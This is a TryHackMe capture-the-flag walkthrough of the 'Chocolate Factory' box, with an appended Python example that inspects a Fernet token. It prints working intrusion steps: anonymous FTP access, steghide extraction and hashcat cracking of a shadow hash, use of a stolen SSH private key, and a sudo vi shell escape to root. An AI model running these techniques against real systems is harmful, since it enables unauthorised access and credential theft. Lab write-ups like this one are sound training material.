TryHackMe Walkthrough - Chocolate Factory
Oompa Loompa Doompety Doo! I've got a perfect room for you!
18/01/2021
Another day, another box! I just hope it's not as weird as the Charlie and the Chocolate Factory movie was...
Room by 0x9747 and saharshtapi and AndyInfoSec. Check it out here!
Enumeration
We start with an Nmap scan of the system. As always, I ran a full port scan with service enumeration:
nmap -sV -p- IP
I got a lot of results from doing this, a lot of open services.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
100/tcp open newacct?
101/tcp open hostname?
102/tcp open iso-tsap?
103/tcp open gppitnp?
104/tcp open acr-nema?
105/tcp open csnet-ns?
106/tcp open pop3pw?
107/tcp open rtelnet?
108/tcp open snagas?
109/tcp open pop2?
110/tcp open pop3?
111/tcp open rpcbind?
112/tcp open mcidas?
113/tcp open ident?
114/tcp open audionews?
115/tcp open sftp?
116/tcp open ansanotify?
117/tcp open uucp-path?
118/tcp open sqlserv?
119/tcp open nntp?
120/tcp open tcpwrapped
121/tcp open tcpwrapped
122/tcp open tcpwrapped
123/tcp open tcpwrapped
124/tcp open tcpwrapped
125/tcp open tcpwrapped
Let's start simple, with port 80! Visiting the IP in my browser took me to the squirrel room! It's asking for some login credentials which I don't have :( Time for some more enumeration! I ran a dirb scan and a nikto scan on the webserver as well, just in case there was anything we were missing. While that's running, let's check out that FTP port!
FTP
I ran this command to open an FTP session:
ftp IP
Replace IP with your machine's IP. Then I used username anonymous and password anonymous to get access! The oldest FTP trick in the book! When I got in, I looked for files by running "ls" and there was "gum_room.jpg". I ran:
get gum_room.jpg
This downloaded the file onto my machine. It looks like a pretty normal file, but maybe it's hiding something? We can use steghide to check! I ran the command:
steghide extract -sf gum_room.jpg
Would you look at that! A file was hidden inside called "b64.txt". If we look at the contents of it, it looks like Base64. I put it into CyberChef to decode it from Base64. It looks like the contents of a /etc/shadow file and has the password hash for the user charlie! Let's crack it!
Cracking Charlie's Hash / Answer 2
I moved the hash into its own file called "charlie.hash". I then used hashcat and the rockyou.txt wordlist to try and crack it.
hashcat -a 0 -m 1800 charlie.hash /usr/share/wordlists/rockyou.txt
After a little bit of time I got our password! I tried this for SSH login but it didn't work... maybe on the website? And we're in! I could successfully log in to the website using the username "charlie" and the password we just cracked!
Website / Answer 1
We seem to be able to execute commands on the server via the input box. We can look at the files in our directory by running "ls". There was one that stood out: key_rev_key. Running "cat key_rev_key" shows us that it's some sort of compiled executable! By looking at the page source we can see it more clearly! We can look at the strings in the executable by running:
strings key_rev_key
There's a big giveaway with "congratulations you have found the key:". Right after it is our key and the answer to question 1! Maybe this will come in handy later...
Charlie Access / Answer 4
Let's see if we can get access to the Charlie user! We can look at his files by running:
ls /home/charlie
There's the user flag! But we don't have permission to open it! There are two other files: teleport and teleport.pub. Could be a set of SSH keys? We can take a look at one of them by running:
cat /home/charlie/teleport
Looks like an SSH private key to me! Let's copy that onto our system! I saved it as "teleport" to keep things simple. We need to make sure we set the permissions correctly on this key, otherwise the server won't like it. Run this command:
chmod 700 teleport
This way only the owner (which is us!) can access it and the server will stay happy! Now we just run:
ssh -i teleport charlie@IP
We're in! :D Now we can get that user flag by navigating home and opening it up!
cd /home/charlie
cat user.txt
One flag down... one to go...
Root / Answer 5
Let's check what programs we can run as sudo by running:
sudo -l
It looks like we can run "vi" as sudo! Perfect! I looked up vi in GTFOBins and found a nice way to get us root access! We just have to run:
sudo vi -c ':!/bin/sh' /dev/null
We're in! We can change directory into root and see if that flag's there!
cd /root
ls
No flag :( But there is "root.py"! Let's open it up!
cat root.py
from cryptography.fernet import Fernet
import pyfiglet
key=input("Enter the key: ")  # Fernet expects a 44-character urlsafe-base64 key
f=Fernet(key)
encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'
dcrypt_mess=f.decrypt(encrypted_mess)  # raises InvalidToken if the key is wrong
mess=dcrypt_mess.decode()
display1=pyfiglet.figlet_format("You Are Now The Owner Of ")
display2=pyfiglet.figlet_format("Chocolate Factory ")
print(display1)
print(display2)
print(mess)
Looks like we have an encrypted string and need a key to crack it! When trying to run the python script I ran into some issues so let's use this website instead. We can put the contents of the "encrypted_mess" variable into the "token" field, now we just need a key! Let's try our key from answer 1! Make sure to only include the section from "-" to "="! There's our key! Done!
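Not part of the original write-up: an added Python example that pulls apart the Fernet token from root.py with only the standard library, checks that a key has the Fernet shape (32 bytes of urlsafe Base64, so 44 characters ending in "="), which is why only that section of the strings output is the key, and recomputes the HMAC that makes decryption fail under a wrong key. DEMO_KEY is a constructed placeholder, not the key recovered from key_rev_key.

```python
# Added example, not from the write-up: parse the Fernet token in root.py with
# the standard library and show the HMAC check that makes a wrong key fail.
import base64, hashlib, hmac, os, struct
from datetime import datetime, timezone

# Token copied from root.py on the box (the encrypted_mess variable).
TOKEN = ("gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-"
         "NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ")

# Constructed placeholder key; the real one comes out of key_rev_key on the box.
DEMO_KEY = base64.urlsafe_b64encode(b"\x01" * 32).decode()

def parse_token(token):
    """Split a Fernet token: 0x80 | 8-byte timestamp | 16-byte IV | ciphertext | 32-byte HMAC."""
    raw = base64.urlsafe_b64decode(token)
    if len(raw) < 57 or raw[0] != 0x80:
        raise ValueError("not a Fernet token")
    (ts,) = struct.unpack(">Q", raw[1:9])
    return {"version": raw[0], "timestamp": ts,
            "issued": datetime.fromtimestamp(ts, tz=timezone.utc),
            "iv": raw[9:25], "ciphertext": raw[25:-32], "mac": raw[-32:]}

def check_key(key):
    """A Fernet key is 32 bytes of urlsafe base64: 44 chars ending in '='."""
    raw = base64.urlsafe_b64decode(key)
    if len(raw) != 32:
        raise ValueError("Fernet key must decode to exactly 32 bytes")
    return raw

def verify_token(token, key):
    """Recompute HMAC-SHA256 over everything but the tag with the signing half of the key."""
    raw = base64.urlsafe_b64decode(token)
    signing_key = check_key(key)[:16]  # first 16 bytes sign, last 16 encrypt (AES-128-CBC)
    expected = hmac.new(signing_key, raw[:-32], hashlib.sha256).digest()
    return hmac.compare_digest(expected, raw[-32:])

def make_demo_token(key, ciphertext):
    """Build a structurally valid token with a correct tag; the ciphertext is opaque here."""
    body = b"\x80" + struct.pack(">Q", 1601551990) + os.urandom(16) + ciphertext
    tag = hmac.new(check_key(key)[:16], body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()

if __name__ == "__main__":
    info = parse_token(TOKEN)
    print(f"issued {info['issued']:%Y-%m-%d %H:%M:%S} UTC, "
          f"{len(info['ciphertext'])} ciphertext bytes, tag {info['mac'].hex()[:16]}...")
    print("demo token verifies:", verify_token(make_demo_token(DEMO_KEY, b"\0" * 48), DEMO_KEY))
    print("real token with demo key:", verify_token(TOKEN, DEMO_KEY))
```

The 48 ciphertext bytes are three AES blocks, so the hidden message is between 33 and 47 bytes long before padding; the token's timestamp dates it to 1 October 2020.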
Conclusion
I had a lot of fun doing this room! I was a bit confused by the ordering of the questions, finding the answer to question 2 before question 1, but other than that it was quite straightforward! It's a bit harder than some of the other "easy" boxes on TryHackMe but not too complicated!